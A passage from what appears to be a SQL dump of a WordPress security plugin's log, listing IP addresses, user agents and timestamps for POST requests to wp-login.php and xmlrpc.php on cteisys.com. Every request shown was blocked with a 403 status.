AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','o8blGFC0EncZyqV7eBjxJDup',0,1665367352.3643,17310,'','POST',403,0,600,0,1,'',0),('149.56.26.54',2503481910,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','oJY1HBSyTM6IN3XbCl0tE578',0,1665372062.8749,1537,'','POST',403,0,600,0,1,'',0),('66.29.138.73',1109232201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PhBaJnWblk1DF76VKictpLuX',0,1665372005.7201,2658,'','POST',403,0,515,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bBvaGTH5iNnyD84JFtuq6cKZ',0,1665371539.7241,2395,'','POST',403,0,515,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','FcbsmlhCKxM96025rX4RBwEZ',0,1665371472.0601,17244,'','POST',403,0,600,0,1,'',0),('150.109.148.216',2523763928,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','u9Xz1qnRp5DPUvte6JWTbOxi',0,1665371034.4907,17072,'','POST',403,0,600,0,1,'',0),('13.237.121.70',233666886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wE4mAvPO5eaCVG1tHY73z6Mj',0,1665370942.8123,2429,'','POST',403,0,515,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mkYM9FfcsPUaOvloL1ErAuzy',0,1665377970.2390,18785,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1H45izuGxgom6nyJhZIY9DpQ',0,1665377747.0443,18756,'','POST',403,0,515,0,1,'',0),('198.46.85.155',3324925339,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','GC3AY0cqhEmdJD5f6F1OQgM2',0,1665377563.0384,17723,'','POST',403,0,600,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Mq4yjDsiGc2FJfmWOwt7neAB',0,1665377251.3493,18723,'','POST',403,0,515,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Ugj4kz8eSOPqQJNM260hKHdC',0,1665377140.0534,18190,'','POST',403,0,600,0,1,'',0),('162.241.126.46',2733735470,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kWTc461f2nxJXwqA8CmjVlNB',0,1665376730.3988,20061,'','POST',403,0,515,0,1,'',0),('82.166.39.15',1386620687,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','R1Itcw4g72VZbr0f9MFyGvkQ',0,1665376557.8551,17505,'','POST',403,0,600,0,1,'',0),('3.12.55.205',51132365,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F1pn6fyh7ixeRSOt3NPo8jJ4',0,1665376443.1951,20673,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gldJK5o4NGWczBPRbMv6eYqr',0,1665376168.9294,1752,'','POST',403,0,515,0,1,'',0),('111.230.202.147',1877396115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','nDmVSXJE2l7TjeQ5CqxwdLbH',0,1665376130.0791,17951,'','POST',403,0,600,0,1,'',0),('47.107.33.26',795549978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mQuC2sLqKlcDe7XObGvt0E4x',0,1665375885.8680,20429,'','POST',403,0,515,0,1,'',0),('77.39.212.31',1294455839,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','FTLMZSIKXoHg2esERfknNwJ7',0,1665375551.5865,17402,'','POST',403,0,600,0,1,'',0),('66.94.117.33',1113486625,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I6HcPrj34UJTlgSBbhqZLtpm',0,1665375301.1638,18925,'','POST',403,0,515,0,1,'',0),('173.236.152.148',2917963924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','8LTHRNBhpkbFrut4gQq9a1MU',0,1665375121.4187,13707,'','POST',403,0,600,0,1,'',0),('51.159.15.23',866062103,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qtzsH0vUAfXx7eS3YCZ9TMNk',0,1665375014.1509,18656,'','POST',403,0,515,0,1,'',0),('143.244.162.250',2415174394,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TFBZOxGqhgkRl8cer10Pn7oY',0,1665374721.2404,19536,'','POST',403,0,515,0,1,'',0),('198.46.85.155',3324925339,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','uBzJCIb96ksScl2x7OUfpF5K',0,1665374530.8163,17400,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','pb3neO5VwT9GrcAP2ChR08uj',0,1665381516.5602,1335,'','POST',403,0,600,0,1,'',0),('35.219.66.183',601572023,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DkemCUWxJiL7nqT538lIaQFp',0,1665381462.8467,15191,'','POST',403,0,515,0,1,'',0),('108.179.193.190',1823719870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Dw49LOKphNyJ2ofd3UiCQP1c',0,1665381240.1973,11804,'','POST',403,0,515,0,1,'',0),('195.93.152.83',3277690963,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5RXUG9qu6LOFnxibfkwpIW4K',0,1665380977.8843,18665,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','zH2YB0GIQTDfXrpg6SPv1M8x',0,1665381094.9705,8733,'','POST',403,0,600,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','Tgy2OsHURB7j4WVa58hZAqoK',0,1665380530.0549,17775,'','POST',403,0,600,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iR2xFLdhSsf4tQo6kjUCaNl0',0,1665380185.0244,2573,'','POST',403,0,515,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','SJILDEto65nA0wQNMqzGHKYi',0,1665380118.5865,18215,'','POST',403,0,600,0,1,'',0),('66.94.117.33',1113486625,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','th9fiP71vN8lVcZdkTnmRFWI',0,1665379929.2919,18834,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','mJxUSlAFEuQYcP0H6ZI5vzg3',0,1665379544.2217,5605,'','POST',403,0,600,0,1,'',0),('120.79.8.125',2018445437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MRbnW47YKkCD19JZqadPcVvF',0,1665379676.3480,18638,'','POST',403,0,515,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','muoRbSXBpiVYA4nCztx2rq1I',0,1665379447.4478,18320,'','POST',403,0,515,0,1,'',0),('51.68.228.235',860153067,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Djkg5OVYToPn4zIxBc6tWMQy',0,1665379211.4200,18560,'','POST',403,0,515,0,1,'',0),('45.120.69.121',762856825,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','0QOrLR2jcIHqeDl5mwKaWUAp',0,1665379121.8275,17969,'','POST',403,0,600,0,1,'',0),('198.12.254.32',3322740256,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ovLyZSWnfH0MBaeG9PYRi2F5',0,1665378719.9878,19337,'','POST',403,0,515,0,1,'',0),('64.111.127.191',1081049023,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','GMulwTYhVX1nkdeL2NE0zqmS',0,1665378550.4181,3244,'','POST',403,0,600,0,1,'',0),('151.80.24.73',2538608713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','o0C5kLOzFyXRiHgr8PZsYtDb',0,1665378482.4306,2978,'','POST',403,0,515,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZFCo7PJiRlef4camUHgNzpL2',0,1665378219.0551,6493,'','POST',403,0,515,0,1,'',0),('217.21.87.243',3642054643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','VRyz6OJo0P8l1Cj9kWdrvLFK',0,1665378132.6106,18682,'','POST',403,0,600,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','VoYpbU1BgCxSjKPZD7utAIkf',0,1665385160.7026,583,'','POST',403,0,600,0,1,'',0),('72.167.225.151',1218961815,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','u9kGMsIRd2NbKTWvfUrAELwS',0,1665384950.0247,18710,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LrwJEkCVFj82hycu3ItdRXOH',0,1665384631.1871,1647,'','POST',403,0,515,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','kwIqvmbEu7xairts9UlPAD0y',0,1665384581.2637,17534,'','POST',403,0,600,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7Gm32o5YjHJvlaideLXNsUZz',0,1665384357.8096,18506,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','infYpqCvEzUKc0PMyheQT59j',0,1665384140.9470,1548,'','POST',403,0,600,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','auKPO2Zz58b9tUgx4p6rqGi0',0,1665384047.1823,18941,'','POST',403,0,515,0,1,'',0),('149.248.59.66',2516073282,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','89Hqsa4AYJuxMCvPIboLRhmZ',0,1665383554.7057,17519,'','POST',403,0,600,0,1,'',0),('128.199.178.73',2160570953,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EWj8bQCT2d3gBVzHicaqxmkt',0,1665383450.1385,17567,'','POST',403,0,515,0,1,'',0),('125.212.241.69',2111107397,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bl3MnhV1xNq6iGgjPHTkZ5f4',0,1665383158.5625,2822,'','POST',403,0,515,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','BvDYQXGfLP1OCorsnRKNUztS',0,1665383121.3016,17915,'','POST',403,0,600,0,1,'',0),('216.245.215.122',3639990138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mYNhiU7eCqrEj8BWkfXoJ4Dp',0,1665382868.5816,18855,'','POST',403,0,515,0,1,'',0),('34.64.218.102',574675558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CEn3WSTRrqOl2964hieHMyuB',0,1665382582.8512,18345,'','POST',403,0,515,0,1,'',0),('103.179.87.147',1739806611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GZ5gni7RBUsKSYeQ3D2qahxm',0,1665382299.3801,9080,'','POST',403,0,515,0,1,'',0),('47.111.116.44',795833388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','kKbgZd3Eev4unRt1OUQc8iFS',0,1665382097.4103,17658,'','POST',403,0,600,0,1,'',0),('107.180.107.103',1806986087,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wTVpgdLZI1uBMnQyP4X3NCiU',0,1665381749.9805,19125,'','POST',403,0,515,0,1,'',0),('51.178.138.5',867338757,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','H7grWiqD806pPS5XBv3nysbJ',0,1665388711.6723,17856,'','POST',403,0,600,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6DE80CU2egptwLrzmHPTFhkQ',0,1665388488.5834,11137,'','POST',403,0,515,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','a3uX6BUbSt9W4qwydYvhIxAJ',0,1665388270.2122,9287,'','POST',403,0,600,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jecVKRt05qWDyINLMoYhaPum',0,1665388142.2992,1719,'','POST',403,0,515,0,1,'',0),('111.230.202.147',1877396115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','cqakUFR9QYtLXy8K4OEjgimH',0,1665387673.6387,9861,'','POST',403,0,600,0,1,'',0),('103.98.152.12',1734514700,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fNw23yiIZcUabC6Brz0oP7Ak',0,1665387810.6693,18339,'','POST',403,0,515,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','53OK2wnXZ6TSmJIN87ip1xqA',0,1665387229.6453,1340,'','POST',403,0,600,0,1,'',0),('167.172.56.36',2813081636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PfpVTiGF9IxX4R5cjKleJMUW',0,1665387161.4510,18720,'','POST',403,0,515,0,1,'',0),('161.35.103.104',2703452008,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1f4g9D2brIuwVKSylMRt3siJ',0,1665386833.5822,10371,'','POST',403,0,515,0,1,'',0),('34.68.76.32',574901280,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','tpSRTXNeIx12mFzDgWhV0EH8',0,1665386640.5789,1526,'','POST',403,0,600,0,1,'',0),('51.79.144.41',860852265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oHbzXi5YG0RPyCNWDL97tlZF',0,1665386512.5183,18736,'','POST',403,0,515,0,1,'',0),('72.29.76.78',1209879630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jCAqbxRDHwltv4ceLu8FohJ3',0,1665385878.1723,18437,'','POST',403,0,515,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','QujMDezlqcraN51RXwBYnF0T',0,1665386196.0994,1283,'','POST',403,0,600,0,1,'',0),('85.91.237.106',1432087914,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','kKtoLNhw0qZalFIArUOiWPpz',0,1665385597.0609,17420,'','POST',403,0,600,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','edxg1jnfw6BMSzFslO7a94rb',0,1665385255.8873,20112,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','mCIS6TLsFxYVhfOdE7Rv2BX1',0,1665391953.9738,1552,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kUmVd2ycGrWoLTQCJwFKvfqI',0,1665392344.5052,19101,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gIkOijszeyRfZBlq7GXa9AMb',0,1665391592.7543,19110,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','g23PWbky0Hmc4OJpQVFhLrdI',0,1665391255.0369,19429,'','POST',403,0,515,0,1,'',0),('159.65.219.142',2671893390,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JOTfpweBk1j5cxZCED9K3a4s',0,1665390545.9171,18794,'','POST',403,0,515,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','LOuKAh7NRw4zlr6iPsbVS38v',0,1665390357.9826,18089,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lkH7UejG5yhZYvfnx1KC0sLI',0,1665390185.1056,19441,'','POST',403,0,515,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1rlQSx0PDInGJae6m87qipCf',0,1665389850.8298,11200,'','POST',403,0,515,0,1,'',0),('68.183.75.82',1152863058,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','6uKbVfDclnYTC9g3dWMqwEmO',0,1665389755.7395,17371,'','POST',403,0,600,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jsArnDSVdYLma4TeZqC3xipK',0,1665389505.5774,18816,'','POST',403,0,515,0,1,'',0),('166.62.125.246',2789113334,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','l34kaM6TZv7n8XYfmyENW0rJ',0,1665389313.0564,17751,'','POST',403,0,600,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lib9wnHYd1UDavsCjApRZEQz',0,1665388815.6205,2776,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ebGV1ho908PKuAFyHtNJQaBU',0,1665395687.7336,18779,'','POST',403,0,515,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s8WXZJhyM6YHlq0p75O3BRGE',0,1665395326.3379,18527,'','POST',403,0,515,0,1,'',0),('194.42.98.32',3257557536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4UmWE7XqgwQd6sBGtNnyFoO5',0,1665394951.4528,19260,'','POST',403,0,515,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 